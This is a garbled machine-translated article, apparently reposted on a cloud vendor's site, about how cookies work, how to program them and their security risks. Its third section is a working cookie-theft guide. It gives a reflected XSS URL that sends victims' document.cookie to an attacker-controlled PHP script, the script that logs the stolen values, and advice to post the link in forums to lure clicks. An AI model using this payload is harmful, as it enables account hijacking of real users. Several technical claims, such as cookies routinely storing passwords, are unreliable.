Comprehensive understanding of cookie delivery process, programming implementation and security issues

Source: Internet
Author: User
Tags contains header php code php script domain firewall
Cookies in English is the meaning of small desserts, and the word we can always see in the browser, how food and the browser related to it? You may appear in the Web page when you visit a site that you have logged on to: Hello xx, feel very cordial, it is like eating a small dessert. This is actually done by accessing a file inside your host, so this file is also called a cookie. Want to get a full picture of cookies? Look at the following!

I. Understanding Cookie Application object: Primary Reader

Cookies are when you browse a Web site, a small text file stored on your machine that records your user ID, password, browsed pages, time of stay, etc. when you come to the site again, the site can make the appropriate moves by reading cookies and knowing about your information. , such as on the page display welcome your slogan, or let you do not enter the ID, password directly login and so on. You can select "Set/View Files" on the "general" tab of IE's tools/internet option, and view all cookies saved to your computer. These files are usually named in the user@domain format, user is your local username, domain is the name of the site you are visiting. If you use NETSCAPE browser, it is stored in "C:\PROGRAMFILES\NETSCAPE\USERS\", unlike IE, Netscape uses a cookie file to record cookies for all websites.

To ensure the security of the Internet, we need to set the cookie appropriately. Open the Privacy tab in Tools/internet options (Note that this setting only exists in IE6.0, other versions of IE can be easily adjusted by clicking the Custom Level button in the Security tab of the Tools/internet options) to adjust the security level of the cookie. In general, you can adjust the slider to a high or high position. Most forum sites need to use cookie information, and if you never go to these places, you can tune the security level to "block all cookies." If you are only trying to disable cookies for individual sites, you can click the Edit button to add the Web site you want to block to the list. In the Advanced button option, you can set the first party cookie and the third party cookie, the first party cookie is the cookie of the website you are browsing, and the third party cookie is not sent to you by the Web site you are browsing, usually to the third party cookie Select " Reject ", as shown in Figure 1. If you need to save cookies, you can use IE's "Import export" function, open the "File/Import Export", follow the prompts to operate.

Most of the content in the cookie is encrypted, so it seems to us to be just a bunch of meaningless alphanumeric combinations, and only the server's CGI handlers know what they really mean. With some software we can view more content and use cookie Pal software to look up cookie information, as shown in Figure 2. It provides us with the contents of options such as server, Expires, Name, value, and so on. Where the server is a Web site where cookies are stored, expires records the time and life of the cookie, and the name and value fields are specific data (the 10th edition of this newspaper has a detailed description of the software).
Download Address:Http://www.cbifamily.com/down/200411/cfnetwork/cp1.exe
  
Second, the cookie transfer process for the application of the object: Intermediate readers
  
When you type a URL to a Web site in the browser's address bar, the browser sends a request to the Web site to read the page and displays the results on the monitor. The page then looks for the Amazon Web site's cookie file on your computer and, if found, sends the data from the cookie file to the Amazon server along with the URL you entered earlier. When the server receives the cookie data, it retrieves your ID, your shopping record, personal preferences, and other information in his database, and records the new content, adding it to the database and cookie files. If no cookie is detected or your cookie information does not match the information in the database, you are browsing the site for the first time, and the server's CGI program will create a new ID message for you and save it to the database.
Cookies are delivered using HTTP header information from the Web page code, and each Web page request from the browser can be accompanied by a cookie, for example, when a browser opens or refreshes a Web page operation. The server adds cookies to the HTTP headers of the Web page, and the data is sent back to your browser, and the browser will choose whether to save the data based on the cookie settings in your computer. If the browser does not allow cookies to be saved, the data disappears when the browser is turned off. Cookies are stored on the computer in a different time, which is determined by the server settings. The cookie has a expires (expiration) attribute that determines the time the cookie is saved, and the server can change the save time of the cookie by setting the value of the Expires field. If this property is not set, cookies are only valid while browsing the web, and closing the browser, which automatically disappears, is the case for most sites. Typically, a cookie contains the fields of server, Expires, name, and value, where only the Name and value fields are useful to the server, and the contents of fields such as Expires are simply to tell the browser how to handle the cookies.

Third, the programming of cookies to achieve the applicable object: Senior Readers
  
Most Web programming languages provide support for cookies. such as JavaScript, VBScript, Delphi, ASP, SQL, PHP, C # and so on. In these object-oriented programming languages, the programming use of cookies is basically similar, the general process is: first create a Cookie object (object), and then use the control function of the cookie to assign, read, write, and other operations. So how do you get sensitive information from other user cookies in code? The following is a brief introduction.
There are two main steps in this method, first locate and analyze the Web site you need to collect cookies, and then build the PHP code to collect cookies and put it on a website that you can control, and you can execute the PHP code after the unsuspecting person clicks on the URL you constructed. Here we look at the specific implementation process.

1. Analyze and construct URLs

First open the Web site where we want to collect cookies, which is assumed to be http://www. Xxx.net, login to enter the user name "<A1>" (without quotes), analysis of the data grab bag, get shape like "http://www." xxx.net/txl/login/login.pl?username=<a1>&passwd=&ok.x=28&ok.y=6 code, replace <A1> with < Script>alert (Document.cookie) </script> "Try again; if successful, start constructing the URL:" http://www. Xxx.net/txl/login/login.pl?username=<script>window.open ("&passwd=&ok.x=28&ok.y=6 ' > Http://www.cbifamily.org/cbi.php? " %2bdocument.cookie) </script>&passwd=&ok.x=28&ok.y=6". Where http:///www.cbifamily.org/cbi.php is a script on a host that you can control. Note that "%2b" is the URL encoding for the symbol "+" because "+" will be treated as a space. The URL can be posted in the forum, luring others to click on it.

2. Prepare PHP Script

The purpose of this script is to collect the cookie file, which reads as follows:

  
<?php
$info = getenv ("query_string");
if ($info) {
$fp = fopen ("Info.txt", "a");
Fwrite ($FP, $info. " \ n ");
Fclose ($FP);
}
Header ("Location: http://www.knowsky.com");
?>

Four, the security issue of cookies applicable to the target: all the readers want to secure the Internet

1.Cookie Deception

Cookies record information such as the user's account ID, password, and so on, and are usually encrypted using the MD5 method if delivered online. So after the encrypted processing of information, even if the network on some people with ulterior motives intercepted, also can not understand, because he saw just some meaningless letters and numbers. However, the problem now is that people who intercept cookies do not need to know the meaning of these strings, they simply submit their cookies to the server, and can pass the verification, they can impersonate the victim's identity, landing site. This method is called Cookie spoofing. The prerequisite for cookie spoofing implementation is that the server's validator has a vulnerability and the impostor is to obtain the cookie information of the impersonated person. It is very difficult for the current site verifier to exclude all illegal logins, for example, the language in which the validator is written may have a vulnerability. And it's easy to get someone else's cookie, write a small piece of code in a language that supports cookies (see three), and if you put that code in the network, all cookies can be collected. If a forum allows HTML code or allows you to use flash tags to collect cookies from these technologies, put them in the forum, then take an appealing theme, write interesting content, and quickly collect a lot of cookies. In the forum, many people's passwords are stolen by this method. As to how to prevent, there is no specific, we can only use the usual protection methods, do not use the important password in the forum, also do not use IE automatically save the password function, and try not to log on the site does not know the details.

Code Pitfalls for 2.Flash

Flash has a geturl () function that flash can use to automatically open the specified Web page. So it may lead you to a website that contains malicious code. For example, when you enjoy a beautiful flash animation on your computer, the code in the animation frame may have been quietly connected to the Internet, and a very small page containing special code has been opened. This page collects your cookies and can do other things, such as planting a Trojan horse on your machine and even formatting your hard drive. For Flash This behavior, the website is unable to prohibit, because this is the Flash file internal behavior. What we can do, if you are browsing in the local as far as possible to open the firewall, if the firewall prompts the outgoing packets are not known to you, it is best to prohibit. If you are enjoying it on the Internet, it is best to find some well-known big websites.



Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.